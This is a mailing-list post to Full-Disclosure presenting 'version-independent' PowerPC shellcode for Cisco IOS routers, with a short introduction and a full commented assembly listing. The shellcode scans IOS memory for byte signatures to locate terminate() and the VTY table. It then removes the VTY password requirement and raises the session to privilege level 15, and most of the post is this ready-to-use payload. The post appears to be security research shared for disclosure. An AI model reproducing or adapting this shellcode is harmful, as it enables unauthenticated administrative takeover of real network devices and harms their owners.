Hi, One of the biggest problems with IOS exploitation is that on every different version of IOS, the addresses required to execute useful shellcode are different. Therefore, hard-coded addresses were inserted into shellcode and this made exploits very version-dependent. I have been working on a way around this and here is the first iteration of just one of the solutions to the problem. It uses a search routine to locate 4-byte signatures that occur near references to the required addresses within the IOS image located in the "text" memory region. The addresses are then recovered from memory and used within the shellcode. Cheers, Andy # Version-independent IOS shellcode, Andy Davis 2008 # # No hard-coded IOS addresses required # # The technique uses 4-byte signatures near references to the # required addresses within the IOS "text" memory region. # The addresses are then recovered from memory and used within the # shellcode. # # This is beta 1 - this code can be highly optimised I'm sure, # for example, the search routine could be reused and the number # of registers cleared could be reduced - but it works :-) # # As this is the first iteration of this shellcode, I'm not making any # claims as to exactly how portable it is - it has been tested on a # number of IOS images and therefore, the concept has been demonstrated. # # Various simple techniques have been used to ensure that there are # no nulls in the shellcode .equ sig_vty, 0x7F60B910 # signature for vty_info .equ sig_kill, 0x639C8889 # signature for terminate() .equ start, 0x80018001 # start of the search 3c 80 80 02 lis r4,-32766 38 84 80 01 addi r4,r4,-32767 # the start address for the search 3c a0 63 9d lis r5,25501 38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature 38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls (technique used throughout the shellcode) 38 e7 fe 70 addi r7,r7,-400 7c c4 38 6e l1: lwzux r6,r4,r7 7c 06 28 40 cmplw r6,r5 # is address contents equal to signature 40 82 ff f8 bne 18 # no, keep searching 7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill" 38 84 01 e8 addi r4,r4,488 38 84 fe 70 addi r4,r4,-400 7c c4 28 2e lwzx r6,r4,r5 38 a5 01 98 addi r5,r5,408 38 a5 fe 70 addi r5,r5,-400 7c c6 28 30 slw r6,r6,r5 7c c6 2c 30 srw r6,r6,r5 38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of terminate() from here 7c 84 32 14 add r4,r4,r6 # add offset to current address 7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10 7c e7 3a 78 xor r7,r7,r7 3c a0 7f 61 lis r5,32609 38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature 38 e7 01 94 addi r7,r7,404 38 e7 fe 70 addi r7,r7,-400 7c c4 38 6e l2: lwzux r6,r4,r7 7c 06 28 40 cmplw r6,r5 # is address contents equal to signature 40 82 ff f8 bne 64 # no, keep searching 38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty" 38 84 fe 70 addi r4,r4,-400 7c e7 3a 78 xor r7,r7,r7 7c a4 38 2e lwzx r5,r4,r7 # get two MSBs 38 a5 ff ff addi r5,r5,-1 7d 08 42 78 xor r8,r8,r8 39 08 01 a0 addi r8,r8,416 39 08 fe 70 addi r8,r8,-400 7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000) 38 84 01 94 addi r4,r4,404 38 84 fe 70 addi r4,r4,-400 7c c4 38 2e lwzx r6,r4,r7 # get two LSBs 7c c6 40 30 slw r6,r6,r8 7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY) 7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY) 38 a5 01 08 addi r5,r5,264 # move to the 66th element of the array (VTY 0 - see IOS "systat" command) 7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info 90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password 38 e7 ff ff addi r7,r7,-1 39 08 09 1a addi r8,r8,2330 90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15 7c e3 3b 78 mr r3,r7 7d 49 03 a6 mtctr r10 4e 80 04 20 bctr # terminate "this process" _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/